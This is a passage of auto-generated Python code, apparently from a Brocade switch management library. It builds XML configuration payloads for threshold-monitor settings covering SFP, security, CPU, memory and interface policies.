policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
below_lowthresh_action = ET.SubElement(below, "below-lowthresh-action")
below_lowthresh_action.text = kwargs.pop('below_lowthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_apply(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
apply = ET.SubElement(sfp, "apply")
apply.text = kwargs.pop('apply')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_pause(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
pause = ET.SubElement(sfp, "pause")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_policy_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name = ET.SubElement(policy, "policy_name")
policy_name.text = kwargs.pop('policy_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
type = ET.SubElement(area, "type")
type.text = kwargs.pop('type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_area_value(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value = ET.SubElement(area, "area_value")
area_value.text = kwargs.pop('area_value')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_threshold_high_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
high_threshold = ET.SubElement(threshold, "high-threshold")
high_threshold.text = kwargs.pop('high_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_threshold_low_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
low_threshold = ET.SubElement(threshold, "low-threshold")
low_threshold.text = kwargs.pop('low_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_threshold_buffer(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
buffer = ET.SubElement(threshold, "buffer")
buffer.text = kwargs.pop('buffer')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_alert_above_above_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
above = ET.SubElement(alert, "above")
above_highthresh_action = ET.SubElement(above, "above-highthresh-action")
above_highthresh_action.text = kwargs.pop('above_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_alert_below_below_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
below_highthresh_action = ET.SubElement(below, "below-highthresh-action")
below_highthresh_action.text = kwargs.pop('below_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_alert_below_below_lowthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
below_lowthresh_action = ET.SubElement(below, "below-lowthresh-action")
below_lowthresh_action.text = kwargs.pop('below_lowthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_apply(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
apply = ET.SubElement(security, "apply")
apply.text = kwargs.pop('apply')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_pause(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
pause = ET.SubElement(security, "pause")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_sec_policy_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name = ET.SubElement(policy, "sec_policy_name")
sec_policy_name.text = kwargs.pop('sec_policy_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_sec_area_value(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value = ET.SubElement(area, "sec_area_value")
sec_area_value.text = kwargs.pop('sec_area_value')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_timebase(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
timebase = ET.SubElement(area, "timebase")
timebase.text = kwargs.pop('timebase')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_threshold_sec_high_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
threshold = ET.SubElement(area, "threshold")
sec_high_threshold = ET.SubElement(threshold, "sec-high-threshold")
sec_high_threshold.text = kwargs.pop('sec_high_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_threshold_sec_low_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
threshold = ET.SubElement(area, "threshold")
sec_low_threshold = ET.SubElement(threshold, "sec-low-threshold")
sec_low_threshold.text = kwargs.pop('sec_low_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_threshold_sec_buffer(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
threshold = ET.SubElement(area, "threshold")
sec_buffer = ET.SubElement(threshold, "sec-buffer")
sec_buffer.text = kwargs.pop('sec_buffer')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_alert_above_sec_above_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
alert = ET.SubElement(area, "alert")
above = ET.SubElement(alert, "above")
sec_above_highthresh_action = ET.SubElement(above, "sec-above-highthresh-action")
sec_above_highthresh_action.text = kwargs.pop('sec_above_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_alert_below_sec_below_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
sec_below_highthresh_action = ET.SubElement(below, "sec-below-highthresh-action")
sec_below_highthresh_action.text = kwargs.pop('sec_below_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_alert_below_sec_below_lowthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
sec_below_lowthresh_action = ET.SubElement(below, "sec-below-lowthresh-action")
sec_below_lowthresh_action.text = kwargs.pop('sec_below_lowthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_poll(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Cpu = ET.SubElement(threshold_monitor, "Cpu")
poll = ET.SubElement(Cpu, "poll")
poll.text = kwargs.pop('poll')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_retry(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Cpu = ET.SubElement(threshold_monitor, "Cpu")
retry = ET.SubElement(Cpu, "retry")
retry.text = kwargs.pop('retry')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_limit(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Cpu = ET.SubElement(threshold_monitor, "Cpu")
limit = ET.SubElement(Cpu, "limit")
limit.text = kwargs.pop('limit')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_actions(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Cpu = ET.SubElement(threshold_monitor, "Cpu")
actions = ET.SubElement(Cpu, "actions")
actions.text = kwargs.pop('actions')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Memory_poll(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Memory = ET.SubElement(threshold_monitor, "Memory")
poll = ET.SubElement(Memory, "poll")
poll.text = kwargs.pop('poll')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Memory_retry(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Memory = ET.SubElement(threshold_monitor, "Memory")
retry = ET.SubElement(Memory, "retry")
retry.text = kwargs.pop('retry')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Memory_limit(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Memory = ET.SubElement(threshold_monitor, "Memory")
limit = ET.SubElement(Memory, "limit")
limit.text = kwargs.pop('limit')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Memory_high_limit(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Memory = ET.SubElement(threshold_monitor, "Memory")
high_limit = ET.SubElement(Memory, "high-limit")
high_limit.text = kwargs.pop('high_limit')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Memory_low_limit(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Memory = ET.SubElement(threshold_monitor, "Memory")
low_limit = ET.SubElement(Memory, "low-limit")
low_limit.text = kwargs.pop('low_limit')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_Memory_actions(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
Memory = ET.SubElement(threshold_monitor, "Memory")
actions = ET.SubElement(Memory, "actions")
actions.text = kwargs.pop('actions')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_apply(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
apply = ET.SubElement(interface, "apply")
apply.text = kwargs.pop('apply')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_pause(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
pause = ET.SubElement(interface, "pause")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_policy_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name = ET.SubElement(policy, "policy_name")
policy_name.text = kwargs.pop('policy_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
type = ET.SubElement(area, "type")
type.text = kwargs.pop('type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_area_value(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value = ET.SubElement(area, "area_value")
area_value.text = kwargs.pop('area_value')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_timebase_value(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
timebase_value = ET.SubElement(threshold, "timebase_value")
timebase_value.text = kwargs.pop('timebase_value')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_high_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
high_threshold = ET.SubElement(threshold, "high-threshold")
high_threshold.text = kwargs.pop('high_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_low_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
low_threshold = ET.SubElement(threshold, "low-threshold")
low_threshold.text = kwargs.pop('low_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_interface_policy_area_threshold_buffer(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
interface = ET.SubElement(threshold_monitor, "interface")
policy = ET.SubElement(interface, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
